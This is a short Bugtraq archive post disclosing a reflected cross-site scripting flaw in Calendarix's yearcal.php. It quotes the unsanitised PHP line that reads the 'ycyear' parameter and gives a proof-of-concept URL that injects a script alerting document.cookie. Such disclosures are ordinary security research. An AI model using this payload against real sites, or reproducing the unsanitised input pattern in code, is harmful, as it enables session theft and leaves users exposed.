Bugtraq mailing list archives
Calendarix "yearcal.php" XSS Attacking
From: botan () linuxmail org
Date: 16 Apr 2006 17:50:57 -0000
Website : http://www.calendarix.com Vulnerable : if (!isset($_GET['ycyear'])) $ycyear = $y ; else $ycyear = $_GET['ycyear']; http://www.site.com/[path]/yearcal.php?ycyear=<script>alert(document.cookie)</script>
Current thread:
- Calendarix "yearcal.php" XSS Attacking botan (Apr 17)